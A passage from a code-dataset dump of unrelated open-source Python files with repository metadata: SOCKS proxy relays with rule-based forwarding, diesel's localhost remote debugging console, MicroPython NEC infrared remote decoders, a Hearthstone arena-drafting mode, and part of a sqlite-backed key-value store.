            }[req.cmd](req)
            self.clean()
        # Fixed Python-2-only `except Exception, e` syntax; `as` works on
        # Python 2.6+ and Python 3.
        except Exception as e:
            log.error("[Exception][SocksForwardSession]: %s" % str(e))
            self.clean()
class SocksForwardFactory(RelayFactory):
    """ forward to another socks.

    Creates SocksForwardSession objects that pipe each accepted client
    connection to a fixed upstream SOCKS server.
    """
    def __init__(self, remoteip, remoteport, timeout=30):
        self.remoteip = remoteip
        self.remoteport = remoteport
        self.timeout = timeout
    def create_relay_session(self, socksconn, clientaddr):
        """Connect to the upstream server and wrap both ends in a session.

        Raises:
            RelaySessionError: when the upstream connection times out.
        """
        try:
            log.info("New socks connection from %s" % str(clientaddr))
            remoteconn = socket.create_connection((self.remoteip, self.remoteport), self.timeout)
            remoteconn.settimeout(self.timeout)
            return SocksForwardSession(socksconn, remoteconn)
        # Fixed Python-2-only `except socket.timeout, e` syntax; the `as`
        # form works on Python 2.6+ and Python 3.
        except socket.timeout as e:  # @UndefinedVariable
            log.error("[Exception][create_relay_session]: %s" % str(e))
            raise RelaySessionError("Remote Timeout.")
| {
"repo_name": "yinghuocho/firefly-proxy",
"path": "DEPRECATED_PYTHON_SRC/gsocks/socks_relay.py",
"copies": "6",
"size": "4538",
"license": "bsd-2-clause",
"hash": 1914957146691816200,
"line_mean": 36.5123966942,
"line_max": 97,
"alpha_frac": 0.5973997356,
"autogenerated": false,
"ratio": 3.8786324786324786,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.02422345770098657,
"num_lines": 121
} |
# a relay with policy based forwarding.
import logging
import re
from gevent import socket
from relay import SocksSession, RelayFactory, RelaySession
from socks_relay import SocksForwardSession
import msg
import utils
log = logging.getLogger(__name__)
class ForwardDestination(object):
    """A forwarding target: a scheme name plus scheme-specific data.

    For socks5 forwarding, `data` is typically a parsed URL of the
    upstream server.
    """
    def __init__(self, scheme, data):
        self.scheme = scheme
        self.data = data
    def __repr__(self):
        return "<{0}:{1!r}>".format(self.scheme, self.data)
class ForwardMatcher(object):
    """Base class deciding where (if anywhere) to forward a connection."""
    def find(self, host, port, proto="tcp"):
        """Return a forward destination for (host, port, proto), or None.

        The base implementation never matches anything.
        """
        return None
class RESocksMatcher(ForwardMatcher):
    """Forward matcher driven by regular-expression rules.

    `rules` maps (host_regex, port_regex, proto_regex) tuples to forward
    destinations; the first rule whose three patterns all match wins.
    """
    def __init__(self, rules):
        self.rules = rules
    def find(self, host, port, proto="tcp"):
        """Return the destination of the first matching rule, else None.

        A trailing dot on `host` is ignored; `port` is matched as a string.
        """
        # Replaced Python-2-only `iteritems()` with `items()`, which behaves
        # identically here and also works on Python 3.
        for (pattern, dst) in self.rules.items():
            (h, p, pr) = pattern
            if re.match(pr, proto) and re.match(h, host.rstrip(".")) \
                and re.match(p, str(port)):
                log.info("forward rule %s found for %s:%d:%s" % (dst, host, port, proto))
                return dst
        return None
class SmartRelayError(Exception): pass
class SmartRelaySession(RelaySession):
    """SOCKS session with policy-based forwarding.

    Each request is checked against a matcher; if a rule matches, the
    connection is forwarded through the registered scheme handler
    (currently socks5 over TCP or UDP), otherwise it is served as a plain
    local SOCKS session.
    """
    def __init__(self, socksconn, timeout, matcher):
        # NOTE(review): `timeout` is never stored here although
        # forward_socks5_tcp/udp read self.timeout — presumably the
        # RelaySession base sets it; confirm.
        super(SmartRelaySession, self).__init__(socksconn)
        self.forwarders = {}
        self.matcher = matcher
        self.handler = None
        self.register_forwarder("socks5", "tcp", self.forward_socks5_tcp)
        self.register_forwarder("socks5", "udp", self.forward_socks5_udp)
    def register_forwarder(self, scheme, proto, forwarder):
        """Register a handler under the "scheme_proto" key."""
        self.forwarders["_".join([scheme, proto])] = forwarder
    def find_forwarder(self, scheme, proto):
        """Return the handler for (scheme, proto), or None."""
        return self.forwarders.get("_".join([scheme, proto]), None)
    def forward_socks5_handshake(self, socksconn):
        """Perform the no-auth SOCKS5 handshake on the upstream connection.

        Returns True when the server accepts no-authentication.
        """
        initreq = msg.InitRequest()
        socksconn.sendall(initreq.pack())
        initreply = utils.read_init_reply(socksconn)
        if initreply.method != msg.NO_AUTHENTICATION_REQUIRED:
            return False
        return True
    def forward_socks5_tcp(self, url, req):
        """Forward a TCP request through the upstream socks at *url*."""
        remoteconn = socket.create_connection((url.hostname, url.port), self.timeout)
        remoteconn.settimeout(self.timeout)
        handler = SocksForwardSession(self.socksconn, remoteconn)
        self.handler = handler
        # handshake, send request, then start to pipe
        if self.forward_socks5_handshake(handler.remoteconn):
            handler.proc_tcp_request(req)
            handler.relay_tcp()
        return True
    def forward_socks5_udp(self, url, localhandler, firstdata, firstaddr):
        """Forward a UDP association (and its first datagram) via *url*."""
        remoteconn = socket.create_connection((url.hostname, url.port), self.timeout)
        remoteconn.settimeout(self.timeout)
        handler = SocksForwardSession(self.socksconn, remoteconn)
        # copy already-exist states from local handler
        handler.client_associate = localhandler.client_associate
        handler.last_clientaddr = localhandler.last_clientaddr
        handler.client2local_udpsock = localhandler.client2local_udpsock
        handler.track_sock(handler.client2local_udpsock)
        self.handler = handler
        # handshake, then request-reply, then send first packet, finally start to pipe
        if self.forward_socks5_handshake(handler.remoteconn):
            handler.local2remote_udpsock = utils.bind_local_udp(handler.remoteconn)
            handler.track_sock(handler.local2remote_udpsock)
            utils.send_request(handler.remoteconn, msg.UDP_ASSOCIATE, *utils.sock_addr_info(handler.local2remote_udpsock))
            reply = utils.read_reply(handler.remoteconn)
            if reply.rep != msg.SUCCEEDED:
                return False
            handler.remote_associate = (reply.bndaddr, reply.bndport)
            handler.last_clientaddr = firstaddr
            handler.local2remote_udpsock.sendto(firstdata, handler.remote_associate)
            handler.relay_udp()
        return True
    def forward_tcp(self, dst, req):
        """Dispatch a TCP request to the forwarder for dst.scheme."""
        forwarder = self.find_forwarder(dst.scheme, "tcp")
        if forwarder:
            forwarder(dst.data, req)
        else:
            raise SmartRelayError("forward scheme %s not supported" % dst.scheme)
    def forward_udp(self, dst, localhandler, firstdata, firstaddr):
        """Dispatch a UDP association to the forwarder for dst.scheme."""
        forwarder = self.find_forwarder(dst.scheme, "udp")
        if forwarder:
            forwarder(dst.data, localhandler, firstdata, firstaddr)
        else:
            raise SmartRelayError("forward scheme %s not supported" % dst.scheme)
    def cmd_connect(self, req):
        """CONNECT: forward if a rule matches, else serve locally."""
        dst = self.matcher.find(req.dstaddr, req.dstport, proto="tcp")
        if not dst:
            # no forward schemes found, go as local socks proxy
            handler = SocksSession(self.socksconn)
            self.handler = handler
            handler.proc_tcp_request(req)
            handler.relay_tcp()
        else:
            self.forward_tcp(dst, req)
    def cmd_udp_associate(self, req):
        """UDP ASSOCIATE: route based on the first datagram's destination."""
        handler = SocksSession(self.socksconn)
        self.handler = handler
        if handler.proc_udp_request(req):
            # a UDP session is determined by first UDP packet
            firstdata, firstaddr = handler.wait_for_first_udp()
            scheme = self.matcher.find(firstaddr[0], firstaddr[1], proto="udp")
            if not scheme:
                # no forward schemes found, go as local socks proxy
                handler.relay_udp(firstdata, firstaddr)
            else:
                self.forward_udp(scheme, handler, firstdata, firstaddr)
    def clean(self):
        """Clean the base session and whichever handler served the request."""
        super(SmartRelaySession, self).clean()
        if self.handler:
            self.handler.clean()
class SmartRelayFactory(RelayFactory):
    """Produces SmartRelaySession objects that share one rule matcher."""
    def __init__(self, matcher, timeout=30):
        self.matcher = matcher
        self.timeout = timeout
    def set_matcher(self, matcher):
        """Swap in a new rule matcher (e.g. after a configuration reload)."""
        self.matcher = matcher
    def create_relay_session(self, socksconn, clientaddr):
        """Wrap an accepted SOCKS connection in a policy-routing session."""
        return SmartRelaySession(socksconn, self.timeout, self.matcher)
| {
"repo_name": "yinghuocho/gsocks",
"path": "smart_relay.py",
"copies": "6",
"size": "6193",
"license": "bsd-2-clause",
"hash": -8492511650629450000,
"line_mean": 38.7051282051,
"line_max": 122,
"alpha_frac": 0.621669627,
"autogenerated": false,
"ratio": 4.0371577574967406,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.019266500557910852,
"num_lines": 156
} |
"""A remote console into running diesel applications.
With the functions and classes in this module you can open remote Python
console sessions into your diesel applications. Technically, they aren't
remote because it is hardcoded to run over localhost. But they are remote
from a process point of view.
An application that wishes to provide a remote console only needs to import
and call the `install_console_signal_handler` function. That sets a handler
for the SIGTRAP signal that attempts to make a connection to a certain port
on localhost.
Running there should be this module's `main` function. It sends the SIGTRAP
to a specified PID and then waits for a connection.
This inversion of the typical client/server roles is to allow for easily
getting a console into one of many processes running on a host without having
to configure a persistent remote console port or service for each one.
The code also handles redirecting stdout for the console so that the results of
`print` statements and the like are sent to the connected console and not the
local stdout of the process. All other output to stdout will be directed to the
process's normal stdout.
"""
import code
import optparse
import os
import readline # for history feature side-effect
import signal
import struct
import sys
from cStringIO import StringIO
import diesel
from diesel.util import debugtools
port = 4299
def install_console_signal_handler():
    """Call this function to provide a remote console in your app.

    Installs a SIGTRAP handler that forks a diesel loop connecting back
    to the console UI listening on localhost.
    """
    def _on_sigtrap(sig, frame):
        diesel.fork_from_thread(application_console_endpoint)
    signal.signal(signal.SIGTRAP, _on_sigtrap)
class LocalConsole(code.InteractiveConsole):
    """A modified Python interpreter UI that talks to a remote console.

    Instead of executing user input locally, it forwards the source to
    the remote process over the diesel connection and prints the output
    that comes back.
    """
    def runsource(self, source, filename=None):
        # Stash the raw source so runcode() can ship it to the backend.
        self.current_source = source.encode('utf-8')
        return code.InteractiveConsole.runsource(self, source, filename)
    def runcode(self, ignored_codeobj):
        # Wire protocol: 8-byte big-endian length prefix, then the payload,
        # in both directions.
        if self.current_source:
            sz = len(self.current_source)
            header = struct.pack('>Q', sz)
            diesel.send("%s%s" % (header, self.current_source))
            self.current_source = None
            header = diesel.receive(8)
            (sz,) = struct.unpack('>Q', header)
            if sz:
                data = diesel.receive(sz)
                print data.rstrip()
def console_for(pid):
    """Sends a SIGTRAP to the pid and returns a console UI handler.

    The return value is meant to be passed to a diesel.Service.
    """
    os.kill(pid, signal.SIGTRAP)
    banner = "Remote console PID=%d" % pid
    def interactive(addr):
        # Run the local UI until the user exits, then stop the loop.
        ui = LocalConsole()
        ui.interact(banner)
        diesel.quickstop()
    return interactive
class RemoteConsoleService(diesel.Client):
    """Runs the backend console.

    Receives length-prefixed source from the UI, executes it with stdout
    redirected to a per-loop buffer, and sends the captured output back.
    """
    def __init__(self, *args, **kw):
        # Pre-seed the interpreter namespace with handy modules.
        self.interpreter = BackendInterpreter({
            'diesel':diesel,
            'debugtools':debugtools,
            })
        super(RemoteConsoleService, self).__init__(*args, **kw)
    @diesel.call
    def handle_command(self):
        # Wire protocol: 8-byte big-endian length prefix, then the payload,
        # mirrored for the response.
        header = diesel.receive(8)
        (sz,) = struct.unpack('>Q', header)
        data = diesel.receive(sz)
        stdout_patch = StdoutDispatcher()
        with stdout_patch:
            self.interpreter.runsource(data)
        output = stdout_patch.contents
        outsz = len(output)
        outheader = struct.pack('>Q', outsz)
        diesel.send("%s%s" % (outheader, output))
class BackendInterpreter(code.InteractiveInterpreter):
    """Interpreter whose error output is routed through sys.stdout.

    This lets the surrounding stdout patch capture tracebacks and other
    interpreter messages for the remote console.
    """
    def write(self, text):
        sys.stdout.write(text)
def application_console_endpoint():
    """Connects to the console UI and runs until disconnected."""
    # Give the UI a moment to start listening after we were signalled.
    diesel.sleep(1)
    try:
        session = RemoteConsoleService('localhost', port)
    except diesel.ClientConnectionError:
        diesel.log.error('Failed to connect to local console')
        return
    diesel.log.warning('Connected to local console')
    with session:
        while True:
            try:
                session.handle_command()
            except diesel.ClientConnectionClosed:
                diesel.log.warning('Disconnected from local console')
                break
class StdoutDispatcher(object):
    """Dispatches stdout access to a fake or the real file-like object.

    The diesel loop that created the instance sees an in-memory buffer;
    every other loop sees the process's original stdout. Used as a
    context manager that patches and restores sys.stdout.
    """
    def __init__(self):
        self.owning_loop = diesel.core.current_loop.id
        self._orig_stdout = sys.stdout
        self._fake_stdout = StringIO()
    def __getattr__(self, name):
        # Route by loop identity: owner -> buffer, everyone else -> real.
        if diesel.core.current_loop.id != self.owning_loop:
            target = self._orig_stdout
        else:
            target = self._fake_stdout
        return getattr(target, name)
    def __enter__(self):
        sys.stdout = self
        return self
    def __exit__(self, *args):
        sys.stdout = self._orig_stdout
    @property
    def contents(self):
        """Everything the owning loop wrote while the patch was active."""
        return self._fake_stdout.getvalue()
def main():
    """Console UI entry point: `%prog PID` or `%prog dummy` for testing."""
    parser = optparse.OptionParser("Usage: %prog PID")
    parser.add_option(
        '-p', '--port', default=port, type="int",
        help="The port to listen on for console connections",
    )
    options, args = parser.parse_args()
    if not args:
        parser.print_usage()
        raise SystemExit(1)
    if args[0] == 'dummy':
        # Test mode: run a do-nothing app that accepts console connections.
        print "PID", os.getpid()
        def wait_for_signal():
            log = diesel.log.name('dummy')
            log.min_level = diesel.loglevels.INFO
            install_console_signal_handler()
            while True:
                log.info("sleeping")
                diesel.sleep(5)
        diesel.quickstart(wait_for_signal)
    else:
        # Normal mode: signal the target PID and serve the console UI.
        pid = int(args[0])
        svc = diesel.Service(console_for(pid), options.port)
        diesel.quickstart(svc)
# Script entry point: run the console UI / dummy app (see main()).
if __name__ == '__main__':
    main()
| {
"repo_name": "dieseldev/diesel",
"path": "diesel/console.py",
"copies": "1",
"size": "5987",
"license": "bsd-3-clause",
"hash": -6159540925617853000,
"line_mean": 32.0773480663,
"line_max": 79,
"alpha_frac": 0.65040922,
"autogenerated": false,
"ratio": 4.10068493150685,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0024440740921618837,
"num_lines": 181
} |
# Author: Peter Hinch
# Copyright Peter Hinch 2017 Released under the MIT license
from sys import platform
import uasyncio as asyncio
from asyn import Event
from micropython import const
from array import array
from utime import ticks_us, ticks_diff
if platform == 'pyboard':
from pyb import Pin, ExtInt
else:
from machine import Pin
ESP32 = platform == 'esp32' or platform == 'esp32_LoBo'
# Save RAM
# from micropython import alloc_emergency_exception_buf
# alloc_emergency_exception_buf(100)
# Result codes (accessible to application)
# Repeat button code
REPEAT = -1
# Error codes
BADSTART = -2
BADBLOCK = -3
BADREP = -4
OVERRUN = -5
BADDATA = -6
BADADDR = -7
_EDGECOUNT = const(68) # No. of edges in data block
# On 1st edge start a block timer. When it times out decode the data. Time must
# exceed the worst case block transmission time, but (with asyncio latency) be
# less than the interval between a block start and a repeat code start (108ms)
# Value of 73 allows for up to 35ms latency.
class NEC_IR():
    """Asynchronous NEC infrared remote-control receiver/decoder (uasyncio v2).

    A pin IRQ timestamps every edge of the demodulated IR signal. The
    first edge of a burst starts a software timer (`block_time` ms);
    when it expires the collected edge times are decoded and the user
    callback is invoked as callback(result, address, *args), where
    `result` is the command byte, REPEAT, or a negative error code.
    """
    def __init__(self, pin, callback, extended, *args): # Optional args for callback
        self._ev_start = Event()
        self._callback = callback
        self._extended = extended
        self._addr = 0
        self.block_time = 80 if extended else 73 # Allow for some tx tolerance (?)
        self._args = args
        # Edge timestamps in µs; +1 slot lets us detect an overrun burst.
        self._times = array('i', (0 for _ in range(_EDGECOUNT + 1))) # +1 for overrun
        if platform == 'pyboard':
            ExtInt(pin, ExtInt.IRQ_RISING_FALLING, Pin.PULL_NONE, self._cb_pin)
        else: # PR5962 ESP8266 hard IRQ's not supported
            pin.irq(handler = self._cb_pin, trigger = (Pin.IRQ_FALLING | Pin.IRQ_RISING))
        #elif ESP32:
            #pin.irq(handler = self._cb_pin, trigger = (Pin.IRQ_FALLING | Pin.IRQ_RISING))
        #else:
            #pin.irq(handler = self._cb_pin, trigger = (Pin.IRQ_FALLING | Pin.IRQ_RISING), hard = True)
        self._edge = 0
        self._ev_start.clear()
        loop = asyncio.get_event_loop()
        loop.create_task(self._run())
    async def _run(self):
        # Wait for a burst to begin, sleep until it must have ended, decode.
        loop = asyncio.get_event_loop()
        while True:
            await self._ev_start  # Wait until data collection has started
            # Compensate for asyncio latency
            latency = ticks_diff(loop.time(), self._ev_start.value())
            await asyncio.sleep_ms(self.block_time - latency)  # Data block should have ended
            self._decode()  # decode, clear event, prepare for new rx, call cb
    # Pin interrupt. Save time of each edge for later decode.
    def _cb_pin(self, line):
        t = ticks_us()
        # On overrun ignore pulses until software timer times out
        if self._edge <= _EDGECOUNT:  # Allow 1 extra pulse to record overrun
            if not self._ev_start.is_set():  # First edge received
                loop = asyncio.get_event_loop()
                self._ev_start.set(loop.time())  # asyncio latency compensation
            self._times[self._edge] = t
            self._edge += 1
    def _decode(self):
        # Classify the burst by its leading mark/space widths, extract the
        # 32-bit NEC word from space widths, validate, and run the callback.
        overrun = self._edge > _EDGECOUNT
        val = OVERRUN if overrun else BADSTART
        if not overrun:
            width = ticks_diff(self._times[1], self._times[0])
            if width > 4000:  # 9ms leading mark for all valid data
                width = ticks_diff(self._times[2], self._times[1])
                if width > 3000:  # 4.5ms space for normal data
                    if self._edge < _EDGECOUNT:
                        # Haven't received the correct number of edges
                        val = BADBLOCK
                    else:
                        # Time spaces only (marks are always 562.5µs)
                        # Space is 1.6875ms (1) or 562.5µs (0)
                        # Skip last bit which is always 1
                        val = 0
                        for edge in range(3, _EDGECOUNT - 2, 2):
                            val >>= 1
                            if ticks_diff(self._times[edge + 1], self._times[edge]) > 1120:
                                val |= 0x80000000
                elif width > 1700: # 2.5ms space for a repeat code. Should have exactly 4 edges.
                    val = REPEAT if self._edge == 4 else BADREP
        addr = 0
        if val >= 0:  # validate. Byte layout of val ~cmd cmd ~addr addr
            addr = val & 0xff
            cmd = (val >> 16) & 0xff
            if addr == ((val >> 8) ^ 0xff) & 0xff:  # 8 bit address OK
                val = cmd if cmd == (val >> 24) ^ 0xff else BADDATA
                self._addr = addr
            else:
                addr |= val & 0xff00  # pass assumed 16 bit address to callback
                if self._extended:
                    val = cmd if cmd == (val >> 24) ^ 0xff else BADDATA
                    self._addr = addr
                else:
                    val = BADADDR
        if val == REPEAT:
            addr = self._addr  # Last valid addresss
        self._edge = 0  # Set up for new data burst and run user callback
        self._ev_start.clear()
        self._callback(val, addr, *self._args)
| {
"repo_name": "peterhinch/micropython-async",
"path": "v2/nec_ir/aremote.py",
"copies": "1",
"size": "5208",
"license": "mit",
"hash": -5470052853985313000,
"line_mean": 40.9838709677,
"line_max": 103,
"alpha_frac": 0.5681905494,
"autogenerated": false,
"ratio": 3.7399425287356323,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9795877199024383,
"avg_score": 0.002451175822249855,
"num_lines": 124
} |
# Author: Peter Hinch
# Copyright Peter Hinch 2017 Released under the MIT license
from sys import platform
import uasyncio as asyncio
from primitives.message import Message
from micropython import const
from array import array
from utime import ticks_ms, ticks_us, ticks_diff
if platform == 'pyboard':
from pyb import Pin, ExtInt
else:
from machine import Pin
ESP32 = platform == 'esp32' or platform == 'esp32_LoBo'
# Save RAM
# from micropython import alloc_emergency_exception_buf
# alloc_emergency_exception_buf(100)
# Result codes (accessible to application)
# Repeat button code
REPEAT = -1
# Error codes
BADSTART = -2
BADBLOCK = -3
BADREP = -4
OVERRUN = -5
BADDATA = -6
BADADDR = -7
_EDGECOUNT = const(68) # No. of edges in data block
# On 1st edge start a block timer. When it times out decode the data. Time must
# exceed the worst case block transmission time, but (with asyncio latency) be
# less than the interval between a block start and a repeat code start (108ms)
# Value of 73 allows for up to 35ms latency.
class NEC_IR():
    """Asynchronous NEC infrared remote-control receiver/decoder (uasyncio v3).

    Same algorithm as the v2 driver but built on the v3 primitives: a
    Message (instead of an Event) carries the burst start time, and
    latency compensation uses ticks_ms() rather than the loop clock.
    The user callback is invoked as callback(result, address, *args).
    """
    def __init__(self, pin, callback, extended, *args): # Optional args for callback
        self._ev_start = Message()
        self._callback = callback
        self._extended = extended
        self._addr = 0
        self.block_time = 80 if extended else 73 # Allow for some tx tolerance (?)
        self._args = args
        # Edge timestamps in µs; +1 slot lets us detect an overrun burst.
        self._times = array('i', (0 for _ in range(_EDGECOUNT + 1))) # +1 for overrun
        if platform == 'pyboard':
            ExtInt(pin, ExtInt.IRQ_RISING_FALLING, Pin.PULL_NONE, self._cb_pin)
        else: # PR5962 ESP8266 hard IRQ's not supported
            pin.irq(handler = self._cb_pin, trigger = (Pin.IRQ_FALLING | Pin.IRQ_RISING))
        self._edge = 0
        self._ev_start.clear()
        asyncio.create_task(self._run())
    async def _run(self):
        # Wait for a burst to begin, sleep until it must have ended, decode.
        while True:
            await self._ev_start  # Wait until data collection has started
            # Compensate for asyncio latency
            latency = ticks_diff(ticks_ms(), self._ev_start.value())
            await asyncio.sleep_ms(self.block_time - latency)  # Data block should have ended
            self._decode()  # decode, clear event, prepare for new rx, call cb
    # Pin interrupt. Save time of each edge for later decode.
    def _cb_pin(self, line):
        t = ticks_us()
        # On overrun ignore pulses until software timer times out
        if self._edge <= _EDGECOUNT:  # Allow 1 extra pulse to record overrun
            if not self._ev_start.is_set():  # First edge received
                self._ev_start.set(ticks_ms())  # asyncio latency compensation
            self._times[self._edge] = t
            self._edge += 1
    def _decode(self):
        # Classify the burst by its leading mark/space widths, extract the
        # 32-bit NEC word from space widths, validate, and run the callback.
        overrun = self._edge > _EDGECOUNT
        val = OVERRUN if overrun else BADSTART
        if not overrun:
            width = ticks_diff(self._times[1], self._times[0])
            if width > 4000:  # 9ms leading mark for all valid data
                width = ticks_diff(self._times[2], self._times[1])
                if width > 3000:  # 4.5ms space for normal data
                    if self._edge < _EDGECOUNT:
                        # Haven't received the correct number of edges
                        val = BADBLOCK
                    else:
                        # Time spaces only (marks are always 562.5µs)
                        # Space is 1.6875ms (1) or 562.5µs (0)
                        # Skip last bit which is always 1
                        val = 0
                        for edge in range(3, _EDGECOUNT - 2, 2):
                            val >>= 1
                            if ticks_diff(self._times[edge + 1], self._times[edge]) > 1120:
                                val |= 0x80000000
                elif width > 1700: # 2.5ms space for a repeat code. Should have exactly 4 edges.
                    val = REPEAT if self._edge == 4 else BADREP
        addr = 0
        if val >= 0:  # validate. Byte layout of val ~cmd cmd ~addr addr
            addr = val & 0xff
            cmd = (val >> 16) & 0xff
            if addr == ((val >> 8) ^ 0xff) & 0xff:  # 8 bit address OK
                val = cmd if cmd == (val >> 24) ^ 0xff else BADDATA
                self._addr = addr
            else:
                addr |= val & 0xff00  # pass assumed 16 bit address to callback
                if self._extended:
                    val = cmd if cmd == (val >> 24) ^ 0xff else BADDATA
                    self._addr = addr
                else:
                    val = BADADDR
        if val == REPEAT:
            addr = self._addr  # Last valid addresss
        self._edge = 0  # Set up for new data burst and run user callback
        self._ev_start.clear()
        self._callback(val, addr, *self._args)
| {
"repo_name": "peterhinch/micropython-async",
"path": "v3/as_drivers/nec_ir/aremote.py",
"copies": "1",
"size": "4878",
"license": "mit",
"hash": -1874614908168559400,
"line_mean": 40.6752136752,
"line_max": 96,
"alpha_frac": 0.5711648893,
"autogenerated": false,
"ratio": 3.8004676539360873,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4871632543236087,
"avg_score": null,
"num_lines": null
} |
# Arena Game Mode
from __init__ import gameMode as mode
from random import uniform, choice
from copy import deepcopy as new
HS_RARITY_RANK = {0:'Free',1:'Common',2:'Rare',3:'Epic',4:'Legendary'}
HS_UPGRADE_CHANCE = 0.2
name = 'Arena'
key = 'arena'
description = "Emulate the standard Hearthstone arena and practice drafting by creating a mock deck."
class gameMode(mode):
    """Mock Hearthstone arena drafting: build sets of three candidate cards,
    with a chance of upgrading each set's rarity tier."""

    def getCardsForRarity(self, rarity):
        """Return all draftable cards for the given rarity tier; basic
        (free) cards are folded into the common tier."""
        coll = self.collection

        def tier_cards(tier):
            # All cards of one rarity tier that suit the drafting hero.
            return [c for c in coll.iterCardsForRarity(HS_RARITY_RANK[tier])
                    if self.isApplicableCard(c)]

        pool = tier_cards(rarity)
        if rarity == 1:
            # Couple basic and common cards.
            pool.extend(tier_cards(0))
        return pool

    def isApplicableCard(self, card):
        """A card applies when it is neutral or matches the drafting hero."""
        return (not card.getHero() or card.getHero() == self.hero.getHero())

    def getSet(self, currRarity=1):
        """Return a tuple of three distinct cards, possibly rarity-upgraded."""
        # Roll for tier upgrades; each success rolls again.
        roll = uniform(0, 1)
        while roll <= HS_UPGRADE_CHANCE and currRarity < len(HS_RARITY_RANK) - 1:
            currRarity += 1
            roll = uniform(0, 1)
        # Draw three distinct cards of the chosen rarity.
        pool = self.getCardsForRarity(currRarity)
        picked = []
        for _ in xrange(3):
            candidate = choice(pool)
            while candidate in picked:
                candidate = choice(pool)
            picked.append(new(candidate))
        return tuple(picked)

    def getDraft(self, numCards):
        ''' Make a draft of numCards sets of three cards. '''
        sets = []
        for idx in xrange(numCards):
            # Picks 1, 10, 20 and 30 are guaranteed rare-or-better.
            if idx in [0, 9, 19, 29]:
                sets.append(self.getSet(2))
            else:
                sets.append(self.getSet(1))
        return sets
| {
"repo_name": "AlexSafatli/HearthstoneDrafter",
"path": "modes/arena.py",
"copies": "1",
"size": "2090",
"license": "mit",
"hash": -5005491515839342000,
"line_mean": 30.1940298507,
"line_max": 105,
"alpha_frac": 0.5358851675,
"autogenerated": false,
"ratio": 3.779385171790235,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4815270339290235,
"avg_score": null,
"num_lines": null
} |
"""A replacement for the PYPI shove module, which unfortunately seems not to be thread safe.
Licensed under the 3-clause BSD License:
Copyright (c) 2011, Neeraj Kumar (neerajkumar.org)
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the author nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL NEERAJ KUMAR BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
class SQLiteStore(object):
    """Sqlite-backing for Shove: a dict-like store with pickled values.

    Keys are strings; values are pickled into a blob column. Queries retry
    on sqlite3.OperationalError (e.g. a locked database) to tolerate
    concurrent access.
    """
    def __init__(self, uri):
        """Creates a sqlite store backed by the database at `uri`."""
        import sqlite3
        self.uri = uri
        self.c = sqlite3.connect(uri).cursor()
        self.c.execute('create table if not exists store ("key" varchar(1024) not null, value blob not null, primary key ("key"))')

    @staticmethod
    def _pickle():
        """Return the pickle module (cPickle on Python 2, pickle on 3)."""
        try:
            import cPickle as pickle
        except ImportError:
            import pickle
        return pickle

    def execute(self, q, arg=None, **kw):
        """Executes a query and returns a list of rows, retrying on error
        up to kw['retries'] (default 10) times.
        Finally raises an operational error if not successful."""
        import sqlite3
        for i in range(kw.get('retries', 10)):
            try:
                if arg:
                    ret = list(self.c.execute(q, arg))
                else:
                    ret = list(self.c.execute(q))
                return ret
            except sqlite3.OperationalError: pass
        raise sqlite3.OperationalError('Could not execute query %s' % (q,))

    def selectone(self, q, *args, **kw):
        """Executes a query and returns the first element of the first row.
        Raises IndexError when the query returned no rows."""
        ret = self.execute(q, *args, **kw)
        return ret[0][0]

    def commit(self, retries=10):
        """Commits, retrying up to `retries` times on OperationalError."""
        import sqlite3
        for i in range(retries):
            try:
                self.c.connection.commit()
                return  # BUGFIX: stop retrying once the commit succeeded
            except sqlite3.OperationalError: pass

    def __len__(self):
        return self.selectone('select count(*) from store')

    def __getitem__(self, k):
        pickle = self._pickle()
        try:
            # bytes() (an alias of str on Python 2) converts the sqlite
            # blob/buffer into the raw byte string pickle.loads() expects
            # on both Python 2 and Python 3.
            ret = bytes(self.selectone('select value from store where key=? limit 1', (k,)))
            return pickle.loads(ret)
        except IndexError: raise KeyError('%s not found in sqlite' % (k,))

    def __setitem__(self, k, v):
        import sqlite3
        pickle = self._pickle()
        # Protocol 1 keeps stored data readable by both Python 2 and 3.
        v = sqlite3.Binary(pickle.dumps(v, protocol=1))
        self.execute('insert or replace into store (key, value) values (?, ?)', (k, v))
        self.commit()

    def __delitem__(self, k):
        try:
            self.selectone('select key from store where key=?', (k,))
        except IndexError: raise KeyError('%s not found in sqlite' % (k,))
        self.execute('delete from store where key=?', (k,))
        self.commit()

    def __contains__(self, k):
        try:
            self.selectone('select key from store where key=?', (k,))
            return True   # BUGFIX: was lowercase `true` (NameError at runtime)
        except IndexError:
            return False  # BUGFIX: was lowercase `false`

    def clear(self):
        self.execute('delete from store')
        self.commit()

    def get(self, k, default=None):
        """Return self[k], or `default` when the key is missing."""
        try:
            return self[k]  # BUGFIX: value was fetched but never returned
        except KeyError: return default

    def setdefault(self, k, default=None):
        try:
            ret = self[k]
        except KeyError:
            ret = self[k] = default
        return ret

    def __iter__(self):
